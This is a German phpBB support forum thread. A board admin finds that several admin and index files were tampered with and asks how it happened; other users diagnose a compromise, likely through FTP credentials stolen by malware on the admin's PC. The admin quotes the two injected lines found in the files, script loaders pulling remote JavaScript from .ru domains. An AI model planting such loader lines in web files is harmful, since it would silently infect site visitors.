Virus im Admin Bereich?

[Trichter]

WICHTIG: Siehe 6. Beitrag des Threads!

[aurora876]

mußt schon genauer werden.
welche mods hast du installiert, was heißt "neuerdings" (was hast du davor gemacht?) und was hat es mit der virenmeldung auf sich, ist die noch aktuell?
hast du das forum auf einem webspace oder lokal installiert?

[Trichter]

Siehe 6. Beitrag des Threads!

[aurora876]

nee, das wäre mir neu, das man im FF erst irgendwas freigeben muß, damit man einen link anklicken darf und ich glaub auch nicht, das du ein virus im adminbereich hast.
was waren die letzten 3 eingebauten mods?
hast du irgendwann mal im adminbereich was verändert?

[Trichter]

Siehe 6. Beitrag des Threads!

[Trichter]

Sorry für den Doppelpost, aber ich habe grad was wichtiges herausgefunden.

2 Dateien wurden letzte Woche verändert, ich war es aber auf keinen Fall, weil ich zu der Zeit nicht zu Hause war.. Zugang darauf habe eigentlich NUR ich, und eben der Anbieter.

Die Dateien die verändert wurden, sind: /adm/style/editor.js und /adm/style/permissions.js

Was zum Teufel ist da los????

WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG WICHTIG

Habe mit meinem Hoster telefoniert und gemeinsam haben wir herausgefunden, dass folgende 5 Dateien mit einem wahrscheinlich bösartigen Javascript Code infiziert worden sind. Die Dateien:

/adm/index.php
/adm/style/editor.js
/adm/style/permissions.js
/index.php
/thumbnailviewer.js
/download/index.htm


Der Code, der ganz unten in jeder Datei vorhanden war:

Code: Alles auswählen

document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Maximize.js"></scri'+'pt>');

Code: Alles auswählen

<script type="text/javascript" src="http://addonrock.ru/Maximize.js"></script>

Jetzt funktioniert der Admin Bereich wieder voll, jedoch frage ich mich, wie es soweit kommen konnte bzw. wie der Code in die Dateien eingepflanzt wurde.

Ich würde mich über Hilfe freuen.

[aurora876]

was soll ich sagen, dein board wurde gecrackt...
lesestoff: https://www.phpbb.de/kb/gehackt

kannst du mir mal sagen, wieso du alle postings hier im thread editierst?
damit ist die bisherige kommunikation für keinen mehr nachvollziehbar

[Trichter]

Hi,

tut mir leid, im nachhinein weiß ich dass es ungünstig für die Mitlesenden war, aber das Ganze hat sich ganz anders entwickelt, aber mein Verdacht hat sich bestätigt.

Ich habe jetzt auf dem Webspace alle Dateien, auch die in den verschiedenen Ordnern, online nach dem Änderungsdatum sortieren lassen und alle Dateien, die an dem Datum geändert wurden, habe ich runtergeladen und gereinigt. Ich werde jetzt mal den Link, den du geschickt hast, mal durchlesen und schauen wie ich weitermachen kann.

Aber wie ist das möglich? Haben die mein Passwort für den Webspace und haben alle Dateien da einzeln geändert und die Codes eingebaut? Es waren jetzt einige mehr, aber vor allem immer index.php oder index.html Dateien.

[Dr.Death]

Moin,

ganz einfach:

Der Virus war auf Deinem eigenen PC.
Der Virus wartet auf eine gültige FTP Verbindung von Dir und schreibt in alle PHP Dateien seinen "nützlichen" Code.
Damit hast Du selbst Dein Webspace infiziert ohne es zu merken.

[Trichter]

Moin,

ganz einfach:

Der Virus war auf Deinem eigenen PC.
Der Virus wartet auf eine gültige FTP Verbindung von Dir und schreibt in alle PHP Dateien seinen "nützlichen" Code.
Damit hast Du selbst Dein Webspace infiziert ohne es zu merken.

Hi,

ja das ist gut möglich, was mich jedoch wundert und was ich nicht verstehe ist, dass ich ca. 2 Wochen weg war und mein Rechner in der Zeit nicht hochgefahren wurde.. Also müsste es ja einen Auslöser dazu gegeben haben, dass das Virus da die Verbindung hergestellt hat oder? Als die Dateien geändert wurden, war ich schon eine Woche im Urlaub, also müsste die Verbindung von irgendwo anders aufgebaut worden sein ODER das Ganze passierte als ich das Virus drauf hatte, aber das Datum der Veränderung sagt ja was anderes. Komisch..